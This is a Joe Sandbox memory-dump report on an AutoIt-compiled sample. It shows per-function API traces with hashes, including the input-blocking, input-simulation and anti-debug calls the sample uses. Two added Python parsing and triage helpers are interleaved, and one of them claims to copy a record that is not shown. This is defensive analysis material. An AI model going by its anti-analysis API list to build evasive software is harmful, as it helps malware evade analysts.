• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: 0c766f8bc8af17944d8969dd9ee1c340748c9e871cdfeff032cfec0d6da00968
• Instruction ID: 8a47ce53770355abd0985fcfc5c875b5f0e9929cd154259337cea812c906fa59
• Opcode Fuzzy Hash: 0c766f8bc8af17944d8969dd9ee1c340748c9e871cdfeff032cfec0d6da00968
• Instruction Fuzzy Hash: BFD0C9B480112DEACB90CB50EC88DD9737CBB04304F104665F106A2000D73895488B14
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007B52EE,?,?,00000035,?), ref: 007A4229
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007B52EE,?,?,00000035,?), ref: 007A4239
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: e155da00fd4747a0c3fd31f79f6ec7cb5566fe7cf2a6159c8ddca72fcb989494
• Instruction ID: 214ebad95d153996cf17247d7ad002f58fca684e8699c1bd254f4610749c97cd
• Opcode Fuzzy Hash: e155da00fd4747a0c3fd31f79f6ec7cb5566fe7cf2a6159c8ddca72fcb989494
• Instruction Fuzzy Hash: 63F0E531600228AAEB2016659C4DFEB766DFFC5761F000279F509D21C2D9B49D00C7B0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0079BC24
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0079BC37
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: 7d6897165b82d4ed973f89f1faa145ee5650729ff8d252ffe2d58a288e25463a
• Instruction ID: ad2a0b1d8791f7db89716defa12a4061ba8b4e48686e40fdfd742cb55de2bfc5
• Opcode Fuzzy Hash: 7d6897165b82d4ed973f89f1faa145ee5650729ff8d252ffe2d58a288e25463a
• Instruction Fuzzy Hash: 25F0497080024DABDB019FA0D805BAE7BB0EF04309F008019F951A5191D37D8611DBA4
Uniqueness
• Uniqueness Score: -1.00%
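As an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: a Python parser that turns function records in the layout used above into structured data, computes each call site's offset from the dump base given as Offset: 00730000 (the value to look up in IDA on the dump), and checks that a record's Opcode ID matches its Opcode Fuzzy Hash. The embedded sample is constructed from two records on this page, the IsDebuggerPresent/SetUnhandledExceptionFilter/UnhandledExceptionFilter record and the BlockInput record that follows, the latter cut off as it is here; the record layout (header lines versus bulleted fields) is assumed from these records, not taken from vendor documentation.

```python
"""Added example, not from the Joe Sandbox report or its tooling: parse the
function records above. The layout is assumed from this page, not documented."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from this page (indentation removed);
# the second is cut off, as it is on the page, to exercise missing fields.
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00762A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00762A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00762AA1
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 464898280ce6c9ed03ef235443484bda26bbceba945a3e46aabe159b733c5cee
• Opcode Fuzzy Hash: 464898280ce6c9ed03ef235443484bda26bbceba945a3e46aabe159b733c5cee
Uniqueness
• Uniqueness Score: -1.00%

APIs
• BlockInput.USER32(00000001), ref: 007AF51A
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: BlockInput
• API String ID: 3456056419-0
"""

API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^(?P<file>\S+), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # argument values as ints; None where the sandbox logged '?'
    ref: int     # virtual address of the call site inside the dump


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    base: int = 0   # the 'Offset:' value, i.e. the image base the dump was taken at
    similarity: dict = field(default_factory=dict)
    uniqueness_score: float = None

    def rva(self, call):
        """Call-site offset from the image base: the address to jump to in IDA on the dump."""
        return call.ref - self.base

    def opcode_ids_consistent(self):
        """True if 'Opcode ID' equals 'Opcode Fuzzy Hash'; None if a cut-off record lacks either."""
        a, b = self.similarity.get("Opcode ID"), self.similarity.get("Opcode Fuzzy Hash")
        return (a == b) if a and b else None


def _parse_args(raw):
    return [None if a == "?" else int(a, 16) for a in raw.split(",") if a]


def parse_records(text):
    """A line with neither a bullet nor ':' is a section header; 'APIs' opens a new record."""
    records, section, rec = [], None, None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if not (line.startswith("•") or ":" in line):
            section = line
            if section == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            continue
        if rec is None:
            continue
        value = line.lstrip("• ")
        if section == "APIs" and (m := API_RE.match(value)):
            rec.apis.append(ApiCall(m["name"], m["module"], _parse_args(m["args"]), int(m["ref"], 16)))
        elif section == "Memory Dump Source" and value.startswith("Source File: "):
            if m := SRC_RE.match(value[len("Source File: "):]):
                rec.source_file, rec.base = m["file"], int(m["base"], 16)
        elif section == "Similarity":
            key, _, val = value.partition(":")
            rec.similarity[key.strip()] = val.strip()
        elif section == "Uniqueness" and value.startswith("Uniqueness Score:"):
            rec.uniqueness_score = float(value.split(":", 1)[1].strip().rstrip("%"))
    return records


def api_index(records):
    """Map each API name to the sorted image-relative call sites (hex) across all records."""
    idx = {}
    for rec in records:
        for call in rec.apis:
            idx.setdefault(call.name, set()).add(f"{rec.rva(call):06X}")
    return {k: sorted(v) for k, v in idx.items()}
```

parse_records accepts the records whether or not the Uniqueness Score line carries a bullet; api_index gives the image-relative addresses (ref minus the 00730000 base, so 00762A8A becomes 032A8A) to use when working on the dump in IDA; and a record cut off at a page boundary leaves opcode_ids_consistent() and uniqueness_score at None instead of raising.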

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • BlockInput.USER32(00000001), ref: 007AF51A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                                                          • Opcode ID: f71fe82f094cbb7b0ee6352c6d7b89150706d3e052660413eb66e8c1741232a2
                                                                                                                                                                                          • Instruction ID: 8808d9a2f6e83001b6865e13f56bcd098f3f09090736d700cfd0098618fcd0fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: f71fe82f094cbb7b0ee6352c6d7b89150706d3e052660413eb66e8c1741232a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: AFE048722006049FD710AF69D405E56F7D8AFA5761F008425F849D7352D674FD40CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0079EC95
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                                                          • Opcode ID: 7347f9bd49c0cd74b92f46590e14114302900f09cc30bebf234b81cb54a2231e
                                                                                                                                                                                          • Instruction ID: a5e5b079b3757e5bb97bf2bcd90162988b840c19cdab346ad21db722c9fe41cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7347f9bd49c0cd74b92f46590e14114302900f09cc30bebf234b81cb54a2231e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F2D05EB61902007AEC1CCA3CBF2FF360A09E303741F80434DF182D5595E4CD9D409131
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0075075E), ref: 00750D4A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                          • Opcode ID: 8079450f721d922ef1119b08fb7de9f48db8f2c392583531dc387a29884c0a85
                                                                                                                                                                                          • Instruction ID: 8382a63a74488b25c10776207a40e698baac269b53b6897289aa1a7b004cd689
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8079450f721d922ef1119b08fb7de9f48db8f2c392583531dc387a29884c0a85
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 007B358D
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 007B35A0
                                                                                                                                                                                          • DestroyWindow.USER32 ref: 007B35AF
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 007B35CA
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 007B35D1
                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 007B3700
                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 007B370E
                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3755
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 007B3761
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007B379D
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37BF
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37D2
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37DD
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37E6
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37F5
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37FE
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3805
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007B3810
                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3822
                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,007D0C04,00000000), ref: 007B3838
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007B3848
                                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 007B386E
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 007B388D
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B38AF
                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3A9C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                           • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                                          • Opcode ID: daa3ad9e79a579060e903135351b8e149e872dbf334ddfb9ac9c98c14e6ab3d4
                                                                                                                                                                                          • Instruction ID: 11c6db82109f3fe7bc046448548865730e8332577435a3ecb3f0daeac9c21812
                                                                                                                                                                                          • Opcode Fuzzy Hash: daa3ad9e79a579060e903135351b8e149e872dbf334ddfb9ac9c98c14e6ab3d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29026B72900205EFDB24DF64CD89EAE7BB9FF48314F048158F915AB2A1DB78AD41CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
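The per-function "APIs" lists above are the part of this report an analyst reads first: BlockInput(1) and mouse_event are the calls behind the "block mouse and keyboard input" and input-simulation signatures, SetUnhandledExceptionFilter is a common debugger-detection seam, and the CreateWindowExW call with class name "AutoIt v3" followed by the CreateFileW / GlobalAlloc / CreateStreamOnHGlobal / OleLoadPicture / SendMessageW(0x172) chain is the splash-image routine of an AutoIt-compiled stub. The script below is an added triage helper, not Joe Sandbox code: it parses lines in the report's "• Api.MODULE(args), ref: ADDR" format (the sample lines are constructed copies in that format), groups them per function record and tags the calls worth a second look. The tag table and its names are this editor's assumption; the only fixed constant used is STM_SETIMAGE (0x0172), which is the documented Win32 value.

```python
"""Triage helper for the per-function API lists in a Joe Sandbox report.

Added example (not Joe Sandbox code). Parses "• Api.MODULE(args), ref: ADDR"
lines, groups them under each "APIs" header and tags interesting calls.
"""
import re
from collections import defaultdict

# Constructed input: lines copied in the format this report uses.
SAMPLE_REPORT = """\
APIs
• BlockInput.USER32(00000001), ref: 007AF51A
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0079EC95
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0075075E), ref: 00750D4A
APIs
• DestroyWindow.USER32 ref: 007B35AF
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3755
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007B37BF
• OleLoadPicture.OLEAUT32(?,00000000,00000000,007D0C04,00000000), ref: 007B3838
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 007B388D
  • Part of subcall function 007C7E22: GetSysColor.USER32(00000012), ref: 007C7E5B
"""

# One API line; the "(args)" part is absent for calls the tracer logged without arguments.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Assumed tag table (editor's choice): APIs that merit a second look and why.
WATCHLIST = {
    "BlockInput": "input-blocking",                     # hinders interactive debugging
    "mouse_event": "input-simulation",                  # synthetic clicks, sandbox evasion
    "SetUnhandledExceptionFilter": "exception-filter",  # classic anti-debug seam
    "OleLoadPicture": "image-load",
    "CreateFileW": "file-read",
}

WINDOW_MESSAGES = {0x0172: "STM_SETIMAGE"}  # documented Win32 constant


def parse_api_lines(text):
    """Return one dict per API line; 'function' counts the 'APIs' headers seen so far."""
    records, function_idx = [], 0
    for line in text.splitlines():
        if line.strip() == "APIs":
            function_idx += 1
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        records.append({
            "function": function_idx,
            "caller": m.group("caller"),
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args is not None else [],
            "ref": m.group("ref"),
        })
    return records


def tag_record(rec):
    """Tags for one parsed call; argument-aware only where the value is unambiguous."""
    tags = set()
    if rec["api"] in WATCHLIST:
        tags.add(WATCHLIST[rec["api"]])
    if rec["api"] == "BlockInput" and rec["args"][:1] == ["00000001"]:
        tags.add("blocks-user-input")  # fBlockIt = TRUE
    if rec["api"] == "SendMessageW" and len(rec["args"]) >= 2:
        msg = rec["args"][1]
        if re.fullmatch(r"[0-9A-F]+", msg):
            tags.add(WINDOW_MESSAGES.get(int(msg, 16), "unknown-message"))
    if rec["api"].startswith("CreateWindowEx") and "AutoIt v3" in rec["args"]:
        tags.add("autoit-compiled")  # class name of AutoIt's hidden main window
    return tags


def triage(text):
    """Map function index -> sorted tag list, dropping functions with nothing of note."""
    per_function = defaultdict(set)
    for rec in parse_api_lines(text):
        per_function[rec["function"]] |= tag_record(rec)
    return {f: sorted(t) for f, t in per_function.items() if t}


if __name__ == "__main__":
    for func, tags in sorted(triage(SAMPLE_REPORT).items()):
        print(f"function #{func}: {', '.join(tags)}")
```

Run against a full report, the tag list per function makes it quick to separate the AutoIt runtime's own GUI and file helpers (the fourth record here) from the handful of calls that actually drive the anti-analysis signatures listed at the top of the report.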

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 007C7B67
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007C7B98
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 007C7BA4
                                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 007C7BBE
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 007C7BCD
                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007C7BF8
                                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 007C7C00
                                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 007C7C07
                                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 007C7C16
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 007C7C1D
                                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 007C7C68
                                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 007C7C9A
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C7CBC
                                                                                                                                                                                            • Part of subcall function 007C7E22: GetSysColor.USER32(00000012), ref: 007C7E5B
                                                                                                                                                                                            • Part of subcall function 007C7E22: SetTextColor.GDI32(?,007C7B2D), ref: 007C7E5F
  • Part of subcall function 007C7E22: GetSysColorBrush.USER32(0000000F), ref: 007C7E75
  • Part of subcall function 007C7E22: GetSysColor.USER32(0000000F), ref: 007C7E80
  • Part of subcall function 007C7E22: GetSysColor.USER32(00000011), ref: 007C7E9D
  • Part of subcall function 007C7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007C7EAB
  • Part of subcall function 007C7E22: SelectObject.GDI32(?,00000000), ref: 007C7EBC
  • Part of subcall function 007C7E22: SetBkColor.GDI32(?,?), ref: 007C7EC5
  • Part of subcall function 007C7E22: SelectObject.GDI32(?,?), ref: 007C7ED2
  • Part of subcall function 007C7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 007C7EF1
  • Part of subcall function 007C7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007C7F08
  • Part of subcall function 007C7E22: GetWindowLongW.USER32(?,000000F0), ref: 007C7F15
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
• API String ID: 4124339563-0
• Opcode ID: 6d91a6cf84be321069ab9799939c5c0a4da64614c226adbb12d97423c6b6c774
• Instruction ID: b6c1809e185c04c04ce8edc2ea8affaf2faee97eb939038b4c9f874b143b7dd0
• Opcode Fuzzy Hash: 6d91a6cf84be321069ab9799939c5c0a4da64614c226adbb12d97423c6b6c774
• Instruction Fuzzy Hash: 30A18D72008305AFC7259F64DC48E6BBBA9FF48320F148A2DF962961A0DB79DD44CF56
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(?,?), ref: 007316B4
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00772B07
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00772B40
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00772F85
  • Part of subcall function 00731802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00731488,?,00000000,?,?,?,?,0073145A,00000000,?), ref: 00731865
• SendMessageW.USER32(?,00001053), ref: 00772FC1
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00772FD8
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00772FEE
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00772FF9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0
• API String ID: 2760611726-4108050209
• Opcode ID: f6a721bb9b99ad660f5e487af538fa40d4c50d7cf8b5992827ca69a0791e0c4b
• Instruction ID: 9101d17cb2dd8c294f128a10e37c82cb7b38a4380b69c1c99e27fca9213ef0bf
• Opcode Fuzzy Hash: f6a721bb9b99ad660f5e487af538fa40d4c50d7cf8b5992827ca69a0791e0c4b
• Instruction Fuzzy Hash: 4F129D30200241EFDB25CF14C859FA9BBE5FB44340F58C56DE4A99B262CB79EC92CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000), ref: 007B319B
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007B32C7
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007B3306
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007B3316
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 007B335D
• GetClientRect.USER32(00000000,?), ref: 007B3369
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 007B33B2
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007B33C1
• GetStockObject.GDI32(00000011), ref: 007B33D1
• SelectObject.GDI32(00000000,00000000), ref: 007B33D5
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007B33E5
